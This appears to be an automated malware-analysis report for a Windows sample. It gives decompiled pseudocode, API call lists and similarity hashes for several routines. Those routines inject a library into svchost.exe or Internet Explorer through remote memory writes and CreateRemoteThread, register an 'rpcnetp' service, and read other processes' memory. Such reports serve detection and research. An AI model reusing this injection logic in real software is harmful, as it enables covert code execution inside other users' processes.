  • VirtualAllocEx.KERNEL32(?,00000000,00001000,00001000,00000004,?,00000000,76E1EA18,?,?,004031F9,?,?,00000000,?,00000000), ref: 0040369D
  • lstrlenA.KERNEL32(?,00000000,?,?,004031F9,?,?,00000000,?,00000000), ref: 004036AE
  • WriteProcessMemory.KERNEL32(?,00000000,?,00000001,?,?,004031F9,?,?,00000000,?,00000000), ref: 004036BB
  • VirtualFreeEx.KERNEL32(?,00000000,00001000,00008000,?,?,004031F9,?,?,00000000,?,00000000), ref: 004036E3
    • Part of subcall function 00403020: CreateRemoteThread.KERNEL32(?,00000000,00000000,?,00402421,00000000,00000000), ref: 00403045
    • Part of subcall function 00403020: WaitForMultipleObjects.KERNEL32(00000001,?,00000000,000000FF), ref: 00403070
    • Part of subcall function 00403020: GetExitCodeThread.KERNEL32(?,?,?,?,!$@,004036DB,?,00000000,!$@,00000000,00000001,?,?,004031F9,?,?), ref: 0040307E
    • Part of subcall function 00403020: CloseHandle.KERNEL32(?), ref: 00403087
Strings
Memory Dump Source
  • Source File: 00000001.00000002.260180009.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.260173827.00400000.00000002.sdmp
  • Associated: 00000001.00000002.260188653.00405000.00000004.sdmp
  • Associated: 00000001.00000002.260196655.00407000.00000002.sdmp
Similarity
  • Total matches: 3
  • API ID: VirtualAllocExVirtualFreeExWriteProcessMemorylstrlen
  • String ID:
  • API String ID: 677720824-0
  • Opcode ID: db6d812f9c7be18267a37d50a3ba51ee4b957c21e9a373aaaee3175b4369baed
  • Instruction ID: 20e9a58cd3c3d7d5d43ac1eac6eb645310d5d17e5d3f8f00a645a8e2a4464bb7
  • Opcode Fuzzy Hash: 70D0A780494E46F4C407B5424C2D326D344EF001D9CDE437074000A6F6BE4A322DEF4A
  • Instruction Fuzzy Hash: 20e9a58cd3c3d7d5d43ac1eac6eb645310d5d17e5d3f8f00a645a8e2a4464bb7
C-Code - Quality: 87%
			E001D3683(void* __ecx, void* _a4, void* _a8, intOrPtr _a12) {
				signed int _v8;
				void* _t18;
				void* _t22;

				_t20 = __ecx;
				_push(__ecx);
				_v8 = _v8 & 0x00000000;
				_t18 = _a8;
				_t22 = VirtualAllocEx(_t18, 0, 0x1000, 0x1000, 4);
				if(_t22 != 0) {
					if(WriteProcessMemory(_t18, _t22, _a4, lstrlenA(_a4) + 1, 0) != 0) {
						E001D3020(_t20, _t18, __imp__LoadLibraryA, _t22, _a12,  &_v8, 1);
					}
					VirtualFreeEx(_t18, _t22, 0x1000, 0x8000);
				}
				return _v8;
			}






0x001d3683
0x001d3686
0x001d3687
0x001d368c
0x001d36a3
0x001d36a7
0x001d36c3
0x001d36d6
0x001d36d6
0x001d36e3
0x001d36e3
0x001d36f0

APIs
  • VirtualAllocEx.KERNEL32(?,00000000,00001000,00001000,00000004,?,00000000,76E1EA18,?,?,001D31F9,?,?,00000000,?,00000000), ref: 001D369D
  • lstrlenA.KERNEL32(?,00000000,?,?,001D31F9,?,?,00000000,?,00000000), ref: 001D36AE
  • WriteProcessMemory.KERNEL32(?,00000000,?,00000001,?,?,001D31F9,?,?,00000000,?,00000000), ref: 001D36BB
  • VirtualFreeEx.KERNEL32(?,00000000,00001000,00008000,?,?,001D31F9,?,?,00000000,?,00000000), ref: 001D36E3
    • Part of subcall function 001D3020: CreateRemoteThread.KERNEL32(?,00000000,00000000,?,001D2421,00000000,00000000), ref: 001D3045
    • Part of subcall function 001D3020: WaitForMultipleObjects.KERNEL32(00000001,?,00000000,000000FF), ref: 001D3070
    • Part of subcall function 001D3020: GetExitCodeThread.KERNEL32(?,?,?,?,?,001D36DB,?,00000000,001D2421,00000000,00000001,?,?,001D31F9,?,?), ref: 001D307E
    • Part of subcall function 001D3020: CloseHandle.KERNEL32(?), ref: 001D3087
Memory Dump Source
  • Source File: 00000001.00000002.260105408.001D1000.00000020.sdmp, Offset: 001D0000, based on PE: true
  • Associated: 00000001.00000002.260098942.001D0000.00000002.sdmp
  • Associated: 00000001.00000002.260113910.001D5000.00000004.sdmp
  • Associated: 00000001.00000002.260121138.001D7000.00000002.sdmp
Similarity
  • Total matches: 6
  • API ID: KillTimerPeekMessageSetTimer$DefWindowProcPostQuitMessageSetEvent
  • String ID: d
  • API String ID: 2989656138-2564639436
  • Opcode ID: 84e743ce579fb83e573cc9db47027a5d92d4bae25c0e57b22563aa8666223114
  • Instruction ID: f8f6ae56d72572d2a7ecf92d988ca55aad03d1572bbfb16aa9d6bab595837ed1
  • Opcode Fuzzy Hash: E9F046477B4A8431CD8BB564500D3E2E187676A2C2DED9667F9087228CDB8C77460E87
  • Instruction Fuzzy Hash: f8f6ae56d72572d2a7ecf92d988ca55aad03d1572bbfb16aa9d6bab595837ed1
C-Code - Quality: 100%
			E001D23B1(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				struct tagMSG _v32;
				void* __ebx;
				void* __edi;
				int _t14;
				int _t17;
				void* _t20;
				int _t21;
				void* _t22;
				void* _t25;
				int _t28;
				_Unknown_base(*)()* _t32;
				void* _t34;
				struct HWND__* _t35;

				_t35 = _a4;
				_t14 = _a8;
				_t32 = 0;
				if(_t14 == 0) {
					L17:
					KillTimer(_t35, 0x64);
					do {
						_t17 = PeekMessageA( &_v32, _t35, 0x113, 0x113, 1);
						__eflags = _t17;
					} while (_t17 != 0);
					PostQuitMessage(_t32);
					__eflags = _a8 - 0x11;
					if(_a8 == 0x11) {
						L4:
						return DefWindowProcA(_t35, _a8, _a12, _a16);
					}
					L20:
					return 0;
				}
				_t20 = _t14 - 0xf;
				if(_t20 == 0) {
					 *0x1d5078 = 1;
					 *0x1d5049 = _t32;
					 *0x1d50bc = _t32;
					L12:
					_t21 = E001D1466(_t34, _a16);
					__eflags = _t21;
					if(_t21 != 0) {
						goto L20;
					}
					_t22 =  *0x1d50c8; // 0x0
					__eflags = _t22 - _t32;
					if(_t22 != _t32) {
						 *0x1d5078 = 1;
						SetEvent(_t22);
					}
					__eflags =  *0x1d5078 - _t32; // 0x0
					if(__eflags != 0) {
						goto L17;
					} else {
						SetTimer(_a4, 0x64, 0x6ddd00, _t32);
						goto L20;
					}
				}
				_t25 = _t20 - 0x102;
				if(_t25 == 0) {
					__eflags = _a12 - 0x64;
					if(_a12 != 0x64) {
						goto L4;
					}
					KillTimer(_t35, 0x64);
					do {
						_t28 = PeekMessageA( &_v32, _t35, 0x113, 0x113, 1);
						__eflags = _t28;
					} while (_t28 != 0);
					E001D32E0(_t32, _t34, _t35);
					__eflags =  *0x1d506c; // 0x0
					if(__eflags == 0) {
						SetTimer(_t35, 0x64, 0x6ddd00, 0);
					}
					goto L4;
				}
				if(_t25 == 0x2ed) {
					goto L12;
				}
				goto L4;
			}
















0x001d23bd
0x001d23c1
0x001d23c4
0x001d23c5
0x001d248d
0x001d2490
0x001d249b
0x001d24a4
0x001d24aa
0x001d24aa
0x001d24af
0x001d24b5
0x001d24b9
0x001d23de
0x00000000
0x001d23e8
0x001d24bf
0x00000000
0x001d24bf
0x001d23cb
0x001d23ce
0x001d243c
0x001d2443
0x001d2449
0x001d244f
0x001d2452
0x001d2457
0x001d2459
0x00000000
0x00000000
0x001d245b
0x001d2460
0x001d2462
0x001d2465
0x001d246c
0x001d246c
0x001d2472
0x001d2478
0x00000000
0x001d247a
0x001d2485
0x00000000
0x001d2485
0x001d2478
0x001d23d0
0x001d23d5
0x001d23f5
0x001d23f9
0x00000000
0x00000000
0x001d23fe
0x001d2409
0x001d2412
0x001d2418
0x001d2418
0x001d241c
0x001d2423
0x001d2429
0x001d2434
0x001d2434
0x00000000
0x001d2429
0x001d23dc
0x00000000
0x00000000
0x00000000

APIs
  • DefWindowProcA.USER32(?,00000011,?,?), ref: 001D23E8
  • KillTimer.USER32(?,00000064), ref: 001D23FE
  • PeekMessageA.USER32(?,?,00000113,00000113,00000001), ref: 001D2412
  • SetTimer.USER32(?,00000064,006DDD00,00000000), ref: 001D2434
    • Part of subcall function 001D1466: PostThreadMessageA.USER32(00000012,00000000,00000000), ref: 001D147F
    • Part of subcall function 001D1466: WaitForSingleObject.KERNEL32(00007530), ref: 001D1490
    • Part of subcall function 001D1466: CloseHandle.KERNEL32 ref: 001D149C
    • Part of subcall function 001D1466: CreateThread.KERNEL32(00000000,00000000,001D36F3,00000000,00000000,001D5088), ref: 001D1592
  • SetEvent.KERNEL32(00000000), ref: 001D246C
  • SetTimer.USER32(?,00000064,006DDD00,00000000), ref: 001D2485
  • KillTimer.USER32(?,00000064), ref: 001D2490
  • PeekMessageA.USER32(?,?,00000113,00000113,00000001), ref: 001D24A4
  • PostQuitMessage.USER32(00000000), ref: 001D24AF
Strings
Memory Dump Source
  • Source File: 00000001.00000002.260105408.001D1000.00000020.sdmp, Offset: 001D0000, based on PE: true
  • Associated: 00000001.00000002.260098942.001D0000.00000002.sdmp
  • Associated: 00000001.00000002.260113910.001D5000.00000004.sdmp
  • Associated: 00000001.00000002.260121138.001D7000.00000002.sdmp
Similarity
  • Total matches: 6
  • API ID: CloseHandleWaitForSingleObject$CreateEventCreateThreadPostMessageRegisterServiceCtrlHandler
  • String ID: rpcnetp
  • API String ID: 1312310708-3180878357
  • Opcode ID: 6fa48f6244e0a94e0ec1405d0d9bbe99e9497798e0a464c9f7457b8b0bb501eb
  • Instruction ID: 05a59ccedef4400ca5738f33da270d839a534878fef554df57ca7f90b4351e82
  • Opcode Fuzzy Hash: 56F0271719401EB3C803F8B38C6C73B17026B599C9EED734531627408CAA0D3244DF4B
  • Instruction Fuzzy Hash: 05a59ccedef4400ca5738f33da270d839a534878fef554df57ca7f90b4351e82
C-Code - Quality: 75%
			E001D34E1() {
				long _v32;
				int _t3;
				struct HWND__* _t10;
				intOrPtr _t17;
				void* _t21;

				 *0x1d504c = CreateEventA(0, 1, 0, 0);
				 *0x1d5050 = 0x10;
				 *0x1d505c = 0x42a;
				 *0x1d5060 = 1;
				_t3 = RegisterServiceCtrlHandlerA("rpcnetp", E001D2FDE);
				 *0x1d50b8 = _t3;
				if(_t3 != 0) {
					_push(0);
					_push(0x1388);
					_t17 = 2;
					_push(_t17);
					 *0x1d5058 = 1;
					E001D2619();
					 *0x1d5058 = 5;
					E001D2619(4, 0, 0);
					E001D35DB();
					 *0x1d505c = 0;
					 *0x1d5060 = 0;
					_t21 = CreateThread(0, 0, E001D2C05, 0, 0,  &_v32);
					if(_t21 != 0) {
						WaitForSingleObject( *0x1d504c, 0xffffffff);
						_t10 =  *0x1d50c0; // 0x0
						if(_t10 != 0) {
							PostMessageA(_t10, 0x11, 0, 0);
						}
						WaitForSingleObject(_t21, 0x7530);
						CloseHandle(_t21);
					} else {
						 *0x1d5060 = _t17;
					}
					CloseHandle( *0x1d504c);
					return E001D2619(1, 0, 0);
				}
				return _t3;
			}








0x001d34fd
0x001d3502
0x001d350c
0x001d3516
0x001d351c
0x001d3524
0x001d3529
0x001d3531
0x001d3532
0x001d3539
0x001d353a
0x001d353b
0x001d3541
0x001d354a
0x001d3554
0x001d3559
0x001d356c
0x001d3572
0x001d357e
0x001d3582
0x001d359a
0x001d359c
0x001d35a3
0x001d35aa
0x001d35aa
0x001d35b6
0x001d35b9
0x001d3584
0x001d3584
0x001d3584
0x001d35c5
0x00000000
0x001d35d4
0x001d35d8

APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 001D34ED
  • RegisterServiceCtrlHandlerA.ADVAPI32(rpcnetp,001D2FDE), ref: 001D351C
    • Part of subcall function 001D2619: SetServiceStatus.ADVAPI32(001D5050,001D3546,00000002,00001388,00000000), ref: 001D263F
    • Part of subcall function 001D35DB: RegOpenKeyExA.ADVAPI32(80000002,00000000,000F003F,?,00000000), ref: 001D35F9
    • Part of subcall function 001D35DB: RegDeleteValueA.ADVAPI32(?,?,?,00000002), ref: 001D3617
    • Part of subcall function 001D35DB: RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,00000002), ref: 001D3630
    • Part of subcall function 001D35DB: RegCloseKey.ADVAPI32(?,?,00000002), ref: 001D3639
  • CreateThread.KERNEL32(00000000,00000000,001D2C05,00000000,00000000,?), ref: 001D3578
  • WaitForSingleObject.KERNEL32(000000FF), ref: 001D359A
  • PostMessageA.USER32(00000000,00000011,00000000,00000000), ref: 001D35AA
  • WaitForSingleObject.KERNEL32(00000000,00007530), ref: 001D35B6
  • CloseHandle.KERNEL32(00000000), ref: 001D35B9
  • CloseHandle.KERNEL32 ref: 001D35C5
Strings
Memory Dump Source
  • Source File: 00000001.00000002.260105408.001D1000.00000020.sdmp, Offset: 001D0000, based on PE: true
  • Associated: 00000001.00000002.260098942.001D0000.00000002.sdmp
  • Associated: 00000001.00000002.260113910.001D5000.00000004.sdmp
  • Associated: 00000001.00000002.260121138.001D7000.00000002.sdmp
Similarity
  • Total matches: 6
  • API ID: ReadProcessMemory$ExitThreadGetStdHandleResetEventSetEvent
  • String ID: x
  • API String ID: 3363633688-2363233923
  • Opcode ID: fde0bc8fb109669d3739e76c01462afd47aceeb39e8aeb63b7d363bff009e474
  • Instruction ID: d25dc53b450804b30b42871723f188176ff746c243b861f620f223eb1a999b37
  • Opcode Fuzzy Hash: 9FF02BD509C909B3D07734881B12F222385FF82DDDD4EDB3538B4642C6BF09A50AA754
  • Instruction Fuzzy Hash: d25dc53b450804b30b42871723f188176ff746c243b861f620f223eb1a999b37
C-Code - Quality: 84%
			E001D2165() {
				int _t51;
				void _t52;
				long _t54;
				void* _t56;
				intOrPtr* _t59;
				void* _t60;
				void* _t61;
				void* _t64;
				void* _t65;
				void* _t67;
				intOrPtr _t69;
				void* _t70;

				_push(0xdb0);
				_push(0x1d1400);
				E001D1637(_t60, _t64, _t67);
				 *(_t70 - 0x1c) =  *(_t70 - 0x1c) & 0x00000000;
				_t61 = GetStdHandle(0xfffffff4);
				 *(_t70 - 4) =  *(_t70 - 4) & 0x00000000;
				_t65 =  *(_t70 + 8);
				if(ReadProcessMemory(_t61, _t65, _t70 - 0x30, 0x10, _t70 - 0x34) == 0) {
					L16:
					 *(_t70 - 4) =  *(_t70 - 4) | 0xffffffff;
					ExitThread( *(_t70 - 0x1c));
				}
				_t66 = _t65 -  *((intOrPtr*)(_t70 - 0x2c));
				if(ReadProcessMemory(_t61, _t65 -  *((intOrPtr*)(_t70 - 0x2c)), _t70 - 0x20, 4, _t70 - 0x34) == 0) {
					goto L16;
				}
				if( *(_t70 - 0x30) == 0x78 ||  *(_t70 - 0x30) == 0x1bc8) {
					__eflags =  *(_t70 - 0x24);
					if( *(_t70 - 0x24) == 0) {
						goto L15;
					}
					_t51 = ReadProcessMemory(_t61,  *(_t70 - 0x28), _t70 - 0xdc0,  *(_t70 - 0x24), _t70 - 0x34);
					__eflags = _t51;
					if(_t51 == 0) {
						goto L16;
					}
					_t52 =  *(_t70 - 0x30);
					_t62 =  *(_t70 - 0x20);
					_t69 = _t52 +  *(_t70 - 0x20);
					 *((intOrPtr*)(_t70 - 0x3c)) = _t69;
					__eflags = _t52 - 0x78;
					if(_t52 == 0x78) {
						_t56 = 0xd80 -  *((intOrPtr*)(_t69 + 8));
						 *((intOrPtr*)(_t70 - 0x40)) = 0xd80;
						__eflags =  *(_t70 - 0x24) - 0xd80;
						if( *(_t70 - 0x24) > 0xd80) {
							_t62 =  *(_t70 - 0x24) - _t56;
							__eflags =  *(_t70 - 0x24) - _t56;
							E001D176E(_t66,  *(_t70 - 0x24) - _t56, _t69, 0,  *(_t70 - 0x24) - _t56);
						}
					}
					_t54 = E001D20DA(_t61, _t62, _t69, _t70 - 0xdc0,  *(_t70 - 0x24));
					goto L14;
				} else {
					if( *(_t70 - 0x30) != 0x3708) {
						L15:
						 *(_t70 - 0x1c) = 1;
						 *( *(_t70 - 0x20) + 0x5c) =  *( *(_t70 - 0x20) + 0x5c) & 0x000000fb;
					} else {
						_t59 =  *(_t70 - 0x20) + 0x3708;
						 *((intOrPtr*)(_t70 - 0x38)) = _t59;
						_push( *_t59);
						if( *(_t70 - 0x28) == 0) {
							_t54 = ResetEvent();
						} else {
							_t54 = SetEvent();
						}
						L14:
						 *(_t70 - 0x1c) = _t54;
					}
					goto L16;
				}
			}















0x001d2165
0x001d216a
0x001d216f
0x001d2174
0x001d2180
0x001d2182
0x001d2190
0x001d219f
0x001d227a
0x001d227a
0x001d2281
0x001d2281
0x001d21af
0x001d21b8
0x00000000
0x00000000
0x001d21c2
0x001d21fd
0x001d2201
0x00000000
0x00000000
0x001d2215
0x001d2217
0x001d2219
0x00000000
0x00000000
0x001d221b
0x001d221e
0x001d2221
0x001d2224
0x001d2227
0x001d222a
0x001d2231
0x001d2234
0x001d2237
0x001d223a
0x001d223f
0x001d223f
0x001d2245
0x001d2245
0x001d223a
0x001d2255
0x00000000
0x001d21cd
0x001d21d4
0x001d225f
0x001d225f
0x001d2269
0x001d21da
0x001d21dd
0x001d21e2
0x001d21e5
0x001d21eb
0x001d21f5
0x001d21ed
0x001d21ed
0x001d21ed
0x001d225a
0x001d225a
0x001d225a
0x00000000
0x001d21d4

APIs
  • GetStdHandle.KERNEL32(000000F4,?,?,?,?,?,?,001D1400,00000DB0), ref: 001D217A
  • ReadProcessMemory.KERNEL32(00000000,?,?,00000010,?,?,?,?,?,?,?,001D1400,00000DB0), ref: 001D219B
  • ReadProcessMemory.KERNEL32(00000000,?,?,00000004,?,?,?,?,?,?,?,001D1400,00000DB0), ref: 001D21B4
  • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,001D1400,00000DB0), ref: 001D21ED
  • ResetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,001D1400,00000DB0), ref: 001D21F5
  • ReadProcessMemory.KERNEL32(00000000,?,?,00000000,?), ref: 001D2215
    • Part of subcall function 001D20DA: SetEvent.KERNEL32(?,?,?), ref: 001D2147
    • Part of subcall function 001D176E: ResetEvent.KERNEL32(?,?,?,?,?,001D1CDD,?,?,00000240,?,?), ref: 001D17B5
  • ExitThread.KERNEL32 ref: 001D2281
Strings
Memory Dump Source
  • Source File: 00000001.00000002.260105408.001D1000.00000020.sdmp, Offset: 001D0000, based on PE: true
  • Associated: 00000001.00000002.260098942.001D0000.00000002.sdmp
  • Associated: 00000001.00000002.260113910.001D5000.00000004.sdmp
  • Associated: 00000001.00000002.260121138.001D7000.00000002.sdmp
Similarity
  • Total matches: 6
  • API ID: GetEnvironmentVariableRegCloseKeyRegOpenKeyRegQueryValueExlstrcat
  • String ID: [FILE]$SystemRoot$[FILE]
  • API String ID: 4133047914-1656360392
  • Opcode ID: ae84fe3816e58394a110c5285e10b2d815e972e04ba8194b59fa15e7161023db
  • Instruction ID: ed5e67ec67d69c723361dcf29c487c07ff661bc4f43c96eb3a608c29c8c24653
  • Opcode Fuzzy Hash: 09D02ECA440F87F8661BB080082DF82B092FE633C04EC63003440592C18F8CB16FEF90
  • Instruction Fuzzy Hash: ed5e67ec67d69c723361dcf29c487c07ff661bc4f43c96eb3a608c29c8c24653
C-Code - Quality: 100%
			E001D3734(void* __ecx, char* _a4, void* _a8) {
				int _v8;
				int _v12;
				char* _t13;
				char* _t23;
				long _t27;
				void* _t29;

				_t27 = _a8;
				_t23 = 0;
				_t29 =  *0x1d506c - _t23; // 0x0
				if(_t29 != 0 || GetEnvironmentVariableA("SystemRoot", _a4, _t27) == 0) {
					if(RegOpenKeyA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\iexplore.exe",  &_a8) == 0) {
						_v8 = _t27;
						if(RegQueryValueExA(_a8, _t23, _t23,  &_v12, _a4,  &_v8) == 0) {
							_t23 = 1;
						}
						RegCloseKey(_a8);
					}
					_t13 = _t23;
				} else {
					lstrcatA(_a4, "\\System32\\svchost.exe");
					_t13 = 1;
				}
				return _t13;
			}









0x001d373a
0x001d373e
0x001d3740
0x001d3746
0x001d3784
0x001d3796
0x001d37a1
0x001d37a5
0x001d37a5
0x001d37a9
0x001d37a9
0x001d37af
0x001d375b
0x001d3763
0x001d376b
0x001d376b
0x001d37b4

APIs
  • GetEnvironmentVariableA.KERNEL32(SystemRoot,?,?,00000044,00000000,?,?,?,001D3118,?,00000104), ref: 001D3751
  • lstrcatA.KERNEL32(?,\System32\svchost.exe,?,?,?,001D3118,?,00000104), ref: 001D3763
  • RegOpenKeyA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\App Paths\iexplore.exe,?), ref: 001D377C
  • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?,?,?,?,001D3118,?,00000104), ref: 001D3799
  • RegCloseKey.ADVAPI32(?,?,?,?,001D3118,?,00000104), ref: 001D37A9
Strings
  • SystemRoot, xrefs: 001D374C
  • Software\Microsoft\Windows\CurrentVersion\App Paths\iexplore.exe, xrefs: 001D3772
  • \System32\svchost.exe, xrefs: 001D375B
Memory Dump Source
  • Source File: 00000001.00000002.260105408.001D1000.00000020.sdmp, Offset: 001D0000, based on PE: true
  • Associated: 00000001.00000002.260098942.001D0000.00000002.sdmp
  • Associated: 00000001.00000002.260113910.001D5000.00000004.sdmp
  • Associated: 00000001.00000002.260121138.001D7000.00000002.sdmp
Similarity
  • Total matches: 6
  • API ID: GetStdHandle$CloseHandleCreateRemoteThreadResumeThreadWaitForMultipleObjects
  • String ID: <
  • API String ID: 2446352009-4251816714
  • Opcode ID: c8242842e98a66eb1eacbd90598b53cfcf33de66ab7a76e9081f6078d45f9eb3
  • Instruction ID: d914cf60e619c89091d9c255d0f38381d528009b3ccf1d544689daf830366f30
  • Opcode Fuzzy Hash: ED0168420642E5B3F54776C41649B2051A1EF43AF5E2C032379BDB26C81B88AE29BF89
  • Instruction Fuzzy Hash: d914cf60e619c89091d9c255d0f38381d528009b3ccf1d544689daf830366f30
C-Code - Quality: 93%
			E001D27E6(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t56;
				void* _t73;
				void* _t78;
				void* _t83;
				void* _t84;

				_push(0xe4);
				_push(0x1d13d0);
				E001D1637(__ebx, __edi, __esi);
				 *(_t84 - 0x20) = 0;
				 *(_t84 - 0x1c) = 0;
				 *((intOrPtr*)(_t84 - 0x28)) = 0;
				 *(_t84 - 0x20) = GetStdHandle(0xfffffff4);
				E001D384D(_t84 - 0xb4, 0, 0x40);
				 *((short*)(_t84 - 0xb4)) = 0x3c;
				E001D3834(_t84 - 0xf4, _t84 - 0xb4, 0x40);
				E001D3864(_t84 - 0x74, _t84 - 0xf4, _t84 - 0xb4);
				 *((intOrPtr*)(_t84 - 0x40)) = E001D3C08;
				 *((intOrPtr*)(_t84 - 0x3c)) = E001D3C9A;
				 *((intOrPtr*)(_t84 - 0x38)) = E001D1C6D;
				_t83 =  *(_t84 + 8);
				 *(_t84 - 0x34) = _t83;
				 *_t83 = 0x238;
				 *((intOrPtr*)(_t83 + 4)) = 6;
				if( *(_t84 - 0x20) != 0 &&  *(_t84 - 0x20) == GetStdHandle(0xfffffff6)) {
					 *((intOrPtr*)(_t84 - 0x28)) = 1;
					 *(_t83 + 0x1bbc) =  *(_t83 + 0x1bbc) | 0x00000004;
					_t73 = CreateRemoteThread( *(_t84 - 0x20), 0, 0, E001D1722(E001D2997), _t83, 4, _t84 - 0x2c);
					 *(_t84 - 0x1c) = _t73;
					if(_t73 == 0) {
						 *(_t83 + 0x1bbc) =  *(_t83 + 0x1bbc) & 0x000000fb;
					}
				}
				 *((intOrPtr*)(_t84 - 0x24)) = E001D17D0;
				_t78 = E001D1CFD;
				_t56 =  *((intOrPtr*)(_t83 + 0x6c)) - 3;
				if(_t56 == 0) {
					L7:
					_t78 = 0;
					goto L8;
				} else {
					if(_t56 != 1) {
						L8:
						_t76 = _t83 + 0x1bc8;
						if(E001D1E99(_t83, _t83 + 0x1bc8, _t78, 2) == 0 || E001D1E99(_t83, _t83 + 0x78,  *((intOrPtr*)(_t84 - 0x24)), 1) == 0) {
							L17:
							return E001D173E(E001D38F2(_t84 - 0x74));
						} else {
							 *(_t84 - 4) = 0;
							if( *((intOrPtr*)(_t84 - 0x28)) == 0) {
								E001D2F13(_t76, 0);
							}
							if( *(_t84 - 0x1c) == 0) {
								do {
									_push(_t84 - 0x74);
									__eflags = E001D2522(0, _t83, __eflags);
								} while (__eflags != 0);
								goto L16;
							} else {
								ResumeThread( *(_t84 - 0x1c));
								WaitForMultipleObjects(2, _t84 - 0x20, 0, 0xffffffff);
								CloseHandle( *(_t84 - 0x1c));
								L16:
								 *(_t84 - 4) =  *(_t84 - 4) | 0xffffffff;
								goto L17;
							}
						}
					}
					 *((intOrPtr*)(_t84 - 0x24)) = 0;
					goto L7;
				}
			}








0x001d27e6
0x001d27eb
0x001d27f0
0x001d27f7
0x001d27fa
0x001d27fd
0x001d280a
0x001d2817
0x001d281c
0x001d2835
0x001d284c
0x001d2851
0x001d2858
0x001d285f
0x001d2866
0x001d2869
0x001d286c
0x001d2872
0x001d287c
0x001d2887
0x001d288e
0x001d28ac
0x001d28b2
0x001d28b7
0x001d28b9
0x001d28b9
0x001d28b7
0x001d28c0
0x001d28c7
0x001d28cf
0x001d28d2
0x001d28da
0x001d28da
0x00000000
0x001d28d4
0x001d28d5
0x001d28dc
0x001d28dc
0x001d28ee
0x001d2954
0x001d2962
0x001d2903
0x001d2903
0x001d2909
0x001d290d
0x001d290d
0x001d2915
0x001d293a
0x001d293d
0x001d2943
0x001d2943
0x00000000
0x001d2917
0x001d291a
0x001d2929
0x001d2932
0x001d2950
0x001d2950
0x00000000
0x001d2950
0x001d2915
0x001d28ee
0x001d28d7
0x00000000
0x001d28d7

APIs
  • GetStdHandle.KERNEL32(000000F4,001D13D0,000000E4), ref: 001D2808
    • Part of subcall function 001D3864: GetVersion.KERNEL32 ref: 001D3881
  • GetStdHandle.KERNEL32(000000F6), ref: 001D2880
  • CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,?,00000004,?), ref: 001D28AC
    • Part of subcall function 001D1E99: InitializeCriticalSection.KERNEL32(?), ref: 001D1ED1
    • Part of subcall function 001D1E99: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 001D1EE4
    • Part of subcall function 001D1E99: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 001D1EF1
    • Part of subcall function 001D1E99: CreateThread.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 001D1F15
    • Part of subcall function 001D1E99: SetThreadPriority.KERNEL32(?,?), ref: 001D1F2E
  • CloseHandle.KERNEL32(?), ref: 001D2932
    • Part of subcall function 001D2F13: ResetEvent.KERNEL32(?,?,?,00000D80,001D185C,?,00000002), ref: 001D2F3D
    • Part of subcall function 001D2F13: SetEvent.KERNEL32(?,?,?,00000D80,001D185C,?,00000002), ref: 001D2F49
    • Part of subcall function 001D2F13: WaitForSingleObject.KERNEL32(?,00000000), ref: 001D2F7C
  • ResumeThread.KERNEL32(?), ref: 001D291A
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001D2929
Strings
Memory Dump Source
  • Source File: 00000001.00000002.260105408.001D1000.00000020.sdmp, Offset: 001D0000, based on PE: true
  • Associated: 00000001.00000002.260098942.001D0000.00000002.sdmp
  • Associated: 00000001.00000002.260113910.001D5000.00000004.sdmp
  • Associated: 00000001.00000002.260121138.001D7000.00000002.sdmp
Similarity
  • Total matches: 5
  • API ID: CreateThreadGetCurrentThreadIdLocalAllocPeekMessagePostMessageSetThreadPriorityWSACleanupWSAStartup
  • String ID:
  • API String ID: 2542947916-0
  • Opcode ID: 2b16ed5e52240c4d80d8b10e68765e774bd0f7290044ab9ce1d8eea53ab31f33
  • Instruction ID: bca26f7798e6cc191a31618cb351ed7e9550d2e82e3dc5b9431044124c0254e2
  • Opcode Fuzzy Hash: E9014C02028CA5E7D0272B911CAA73B6042FF41FFCF9DA79271FC691C16F8596196F41
  • Instruction Fuzzy Hash: bca26f7798e6cc191a31618cb351ed7e9550d2e82e3dc5b9431044124c0254e2
C-Code - Quality: 91%
			E001D2648(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t42;
				void* _t54;
				void* _t56;
				void* _t63;
				void* _t65;
				void** _t71;
				void* _t75;
				void* _t76;

				_push(0x244);
				_push(0x1d13a0);
				E001D1637(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t76 - 0x1c)) = 0;
				E001D384D(_t76 - 0xa8, 0, 0x80);
				 *((intOrPtr*)(_t76 - 0x20)) = 5;
				while(1) {
					L1:
					 *(_t76 - 0x24) = 0;
					 *((intOrPtr*)(_t76 - 0x20)) =  *((intOrPtr*)(_t76 - 0x20)) - 1;
					_t42 =  *((intOrPtr*)(_t76 - 0x20)) - 1;
					if(_t42 == 0) {
						break;
					}
					_t56 = _t42 - 1;
					if(_t56 == 0) {
						_t69 =  *((intOrPtr*)(_t76 + 8));
						_t13 =  *((intOrPtr*)( *((intOrPtr*)(_t76 + 8)))) + 2; // 0x0
						if(E001D2CC7(_t76 - 0xa8,  *((intOrPtr*)( *((intOrPtr*)(_t76 + 8)))) + 6, _t13,  *((intOrPtr*)(_t69 + 4))) <= 0) {
							L14:
							E001D15A3(_t76 - 0xa8);
							while( *((intOrPtr*)(_t76 - 0x1c)) != 0) {
								 *((intOrPtr*)(_t76 - 0x1c)) =  *((intOrPtr*)(_t76 - 0x1c)) - 1;
								 *(_t76 - 4) = 0;
								L001D32DA();
								 *(_t76 - 4) =  *(_t76 - 4) | 0xffffffff;
							}
							return E001D173E(PostMessageA( *0x1d50c0, 0x400, 1, 2));
						}
						if(PeekMessageA(_t76 - 0xc4, 0, 0x12, 0x12, 0) == 0) {
							continue;
						}
						goto L14;
					}
					_t63 = _t56 - 1;
					if(_t63 == 0) {
						continue;
					}
